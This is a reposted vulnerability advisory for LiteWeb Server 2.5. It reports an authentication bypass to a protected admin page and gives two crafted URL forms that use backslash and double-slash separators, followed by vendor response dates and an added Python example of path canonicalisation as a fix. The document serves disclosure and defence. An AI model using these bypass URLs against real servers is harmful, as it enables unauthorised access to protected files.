[Repost] LiteWeb allows remote users to access restricted pages
Author: gss_it@yahoo.com
Application: LiteWeb Server
Web Site: www.cmfperception.com
Versions: 2.5
Platform: Windows
Bug: An access control vulnerability.
Credits:
#########################################
#            == Ziv Kamir ==            #
#                                       #
#  GSSIT - Global Security Solution IT  #
#                                       #
#      Email : gss_it@yahoo.com         #
#                                       #
#      Web : www.gssit.co.il            #
#                                       #
#########################################
---------------------
1) Introduction
2) Bug
3) The Code
4) Fix
================
1) Introduction
================
LiteWeb is a powerful web server that handles multiple domains
and supports PHP, Perl, MySQL, and much more.
=======
2) Bug
=======
A remote user may obtain password-protected files on the server without having to authenticate.
===========
3) The Code
===========
http://Target/\admin\/login.html
http://Target//admin//login.html
======
4) Fix
======
Date of Vendor Notification:
----------------------------
02/06/05
Response:
---------
02/06/05
It will be fixed in the next version.
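
Added example (not part of the original advisory and not LiteWeb's code): a sketch of the server-side check that closes this class of bypass. The advisory does not state the root cause, so this assumes the access check compares the raw request path while the file lookup tolerates extra or mixed separators; the "/admin" prefix and all function names are hypothetical.

```python
from urllib.parse import unquote

# Assumption: "/admin" is the password-protected directory, as in the advisory's URLs.
PROTECTED_PREFIXES = ("/admin",)


def canonical_path(raw_target: str) -> str:
    """Reduce a request target to the single form used for BOTH the
    access check and the file lookup."""
    path = raw_target.split("?", 1)[0].split("#", 1)[0]
    path = unquote(path)               # decode %2F / %5C once
    path = path.replace("\\", "/")     # Windows accepts either separator
    segments = []
    for seg in path.split("/"):
        if seg in ("", "."):           # collapses "//" and "/./"
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def naive_requires_auth(raw_target: str) -> bool:
    """Weak form: prefix match on the raw request target."""
    return any(raw_target.startswith(p + "/") for p in PROTECTED_PREFIXES)


def requires_auth(raw_target: str) -> bool:
    """Hardened form: match on the canonical, case-folded path."""
    path = canonical_path(raw_target).casefold()
    return any(path == p or path.startswith(p + "/") for p in PROTECTED_PREFIXES)


# Constructed sample targets; the second and third are the advisory's two URL forms.
SAMPLES = ["/admin/login.html", "/\\admin\\/login.html", "//admin//login.html",
           "/ADMIN/login.html", "/administrator/index.html", "/index.html"]

if __name__ == "__main__":
    for target in SAMPLES:
        print(f"{target!r:32} naive={naive_requires_auth(target)!s:5} "
              f"hardened={requires_auth(target)}")
```

The file handler must open the path returned by canonical_path(), not the raw target, so the check and the lookup can never disagree.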